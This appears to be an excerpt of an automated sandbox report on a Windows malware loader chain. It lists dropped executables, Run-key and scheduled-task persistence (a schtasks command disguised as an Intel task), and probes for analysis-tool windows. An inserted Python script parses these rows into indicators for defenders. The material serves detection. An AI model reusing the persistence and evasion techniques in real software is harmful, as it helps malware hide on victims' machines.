                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: sgdtbgtm
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: .taggant
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name: .idata
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name: odlbdsvw
                      Source: d7884c562e.exe.5.drStatic PE information: section name: ivvnrpag
                      Source: d7884c562e.exe.5.drStatic PE information: section name: .taggant
                      Source: random[5].exe.5.drStatic PE information: section name: .eh_fram
                      Source: 73c096c84a.exe.5.drStatic PE information: section name: .eh_fram
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name: .idata
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name: mptavxer
                      Source: random[1].exe2.5.drStatic PE information: section name: supuhgzh
                      Source: random[1].exe2.5.drStatic PE information: section name: .taggant
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name: .idata
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name: mptavxer
                      Source: 0577f55121.exe.5.drStatic PE information: section name: supuhgzh
                      Source: 0577f55121.exe.5.drStatic PE information: section name: .taggant
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name: .idata
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name: ztykcjub
                      Source: random[2].exe0.5.drStatic PE information: section name: rrqhotlr
                      Source: random[2].exe0.5.drStatic PE information: section name: .taggant
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name: .idata
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name: ztykcjub
                      Source: 77594b3442.exe.5.drStatic PE information: section name: rrqhotlr
                      Source: 77594b3442.exe.5.drStatic PE information: section name: .taggant
                      Source: random[2].exe1.5.drStatic PE information: section name:
                      Source: random[2].exe1.5.drStatic PE information: section name: .idata
                      Source: random[2].exe1.5.drStatic PE information: section name: kiohytmd
                      Source: random[2].exe1.5.drStatic PE information: section name: gbzfitgk
                      Source: random[2].exe1.5.drStatic PE information: section name: .taggant
                      Source: random[2].exe2.5.drStatic PE information: section name:
                      Source: random[2].exe2.5.drStatic PE information: section name: .idata
                      Source: random[2].exe2.5.drStatic PE information: section name: ifvqdref
                      Source: random[2].exe2.5.drStatic PE information: section name: ulfvmwmt
                      Source: random[2].exe2.5.drStatic PE information: section name: .taggant
                      Source: 7d28d37061cb43098969a37cf25a380a.exe.15.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0006D91C push ecx; ret 0_2_0006D92F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00061359 push es; ret 0_2_0006135A
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0070D91C push ecx; ret 1_2_0070D92F
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F676A push rcx; ret 11_2_001F676B
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_0378633D push eax; ret 40_2_03786351
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_07DB3D64 push FFFFFF8Bh; iretd 40_2_07DB3D6D
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9B98D2A5 pushad ; iretd 44_2_00007FFD9B98D2A6
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BABA61C pushad ; ret 44_2_00007FFD9BABA634
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BABA5BC push eax; ret 44_2_00007FFD9BABA5D4
                      Source: file.exeStatic PE information: section name: entropy: 7.9890404804965165
                      Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.9890404804965165
                      Source: random[3].exe.5.drStatic PE information: section name: entropy: 7.979706188474013
                      Source: random[3].exe.5.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                      Source: 964c9facda.exe.5.drStatic PE information: section name: entropy: 7.979706188474013
                      Source: 964c9facda.exe.5.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                      Source: random[4].exe0.5.drStatic PE information: section name: .text entropy: 7.73440914387992
                      Source: fcd2b0e3cd.exe.5.drStatic PE information: section name: .text entropy: 7.73440914387992
                      Source: random[4].exe1.5.drStatic PE information: section name: odlbdsvw entropy: 7.954786025593838
                      Source: random[1].exe1.5.drStatic PE information: section name: hdwdyvma entropy: 7.9557608307799
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: hdwdyvma entropy: 7.9557608307799
                      Source: d7884c562e.exe.5.drStatic PE information: section name: odlbdsvw entropy: 7.954786025593838
                      Source: random[1].exe2.5.drStatic PE information: section name: mptavxer entropy: 7.947493885557735
                      Source: 0577f55121.exe.5.drStatic PE information: section name: mptavxer entropy: 7.947493885557735
                      Source: random[2].exe0.5.drStatic PE information: section name: entropy: 7.9790031897630564
                      Source: random[2].exe0.5.drStatic PE information: section name: ztykcjub entropy: 7.953755320813844
                      Source: 77594b3442.exe.5.drStatic PE information: section name: entropy: 7.9790031897630564
                      Source: 77594b3442.exe.5.drStatic PE information: section name: ztykcjub entropy: 7.953755320813844

                      Persistence and Installation Behavior

                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\Documents\CAAEBKEGHJ.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\mozglue.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\softokn3.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\nss3.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile created: C:\Users\user\AppData\Local\Temp\MCGXXRICH6C9X2RWLNL.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\freebl3.dll
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile created: C:\Users\user\AppData\Local\Temp\975RDI33VTLWGIQACCE.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Bunifu_UI_v1.5.3.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\msvcp140.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeFile created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\Documents\CAAEBKEGHJ.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeFile created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77594b3442.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ce29828af5.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exe
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
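The Boot Survival rows above can be triaged mechanically. The following Python script is an added example, not part of the Joe Sandbox report or of any sample it describes: it parses rows in the form the report prints them (the Source, event and detail columns run together, with trailing "Jump to behavior" / "Jump to dropped file" link text), drops exact repeats, and pulls out the indicators a responder would hunt for on other hosts: the value names written under HKCU\...\CurrentVersion\Run, the /TN, /TR and /SC arguments of the schtasks command line, the legacy C:\Windows\Tasks\*.job file, and the Filemon/Regmon/Process Monitor window-class probes. The category labels, function names and the rows embedded in SAMPLE_ROWS (copied from the report above, plus one deliberate duplicate and one non-row line) are this example's own choices.

```python
import re
from collections import Counter

# Row shape as the report prints it: the Source column, the event column and the
# detail column are concatenated with no separator, and behaviour rows end with
# the link text "Jump to behavior" or "Jump to dropped file".
EVENTS = (
    "File created", "File opened", "Registry value created or modified",
    "Window searched", "Process created", "Process information set",
)
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?\.exe)"
    r"(?P<event>" + "|".join(re.escape(e) for e in EVENTS) + r"):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to (?:behavior|dropped file))?\s*$"
)
# Window classes of Sysinternals Filemon/Regmon/Process Monitor that the samples
# look for; compared case-insensitively because both spellings occur in the report.
ANALYSIS_TOOL_WINDOWS = {"filemonclass", "regmonclass", "procmon_window_class"}
SCHTASKS_ARG_RE = re.compile(r'/(TN|TR|SC)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)

# Constructed sample input: rows copied from the report, one exact duplicate, one
# row without the trailing link text, and one non-row line ("barindex").
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77594b3442.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77594b3442.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
barindex
"""


def parse_row(line):
    """Split one report row into source, event and detail; None if it is not a row."""
    m = ROW_RE.match(line)
    if not m:
        return None
    return {"source": m["src"], "event": m["event"], "detail": m["detail"]}


def parse_schtasks(cmdline):
    """Extract /TN, /TR and /SC from a schtasks command line (quoted or bare values)."""
    return {key.upper(): quoted or bare
            for key, quoted, bare in SCHTASKS_ARG_RE.findall(cmdline)}


def classify(ev):
    """Map one parsed row to (category, indicator). Category names are this example's own."""
    event, detail, low = ev["event"], ev["detail"], ev["detail"].lower()
    if event == "Registry value created or modified" and "\\currentversion\\run" in low:
        return "persistence:run_key", detail.rpartition(" ")[2]   # value name only
    if event == "Process created" and "schtasks" in low and "/create" in low:
        a = parse_schtasks(detail)
        return ("persistence:scheduled_task",
                f"{a.get('TN')} -> {a.get('TR')} every {a.get('SC')}")
    if event == "File created" and low.startswith("c:\\windows\\tasks\\") and low.endswith(".job"):
        return "persistence:legacy_job", detail
    if event == "Window searched":
        name = detail.split("window name:", 1)[-1].strip()
        if name.lower() in ANALYSIS_TOOL_WINDOWS:
            return "anti_analysis:tool_window_probe", name
    if event == "Process information set" and "noopenfileerrorbox" in low:
        return "anti_analysis:error_box_suppressed", ev["source"]
    if event == "File created":
        return "drop", detail
    return "other", detail


def triage(report_text):
    """Parse every row, drop exact repeats, and group indicators by category.

    Returns (findings, hits): findings maps category -> sorted unique indicators;
    hits counts rows per (source, category), which is how the repeated Run-key
    rows of skotes.exe show up without cluttering the indicator list.
    """
    findings, hits = {}, Counter()
    for line in report_text.splitlines():
        ev = parse_row(line)
        if ev is None:
            continue
        cat, indicator = classify(ev)
        findings.setdefault(cat, set()).add(indicator)
        hits[(ev["source"], cat)] += 1
    return {cat: sorted(v) for cat, v in findings.items()}, hits


if __name__ == "__main__":
    found, counts = triage(SAMPLE_ROWS)
    for cat, indicators in sorted(found.items()):
        print(cat)
        for ind in indicators:
            print("   ", ind)
```

On a live host the same indicators translate directly into checks: Get-ItemProperty on HKCU:\Software\Microsoft\Windows\CurrentVersion\Run for the value names, Get-ScheduledTask for the task name and its one-minute trigger, and a listing of C:\Windows\Tasks for the .job file.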

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
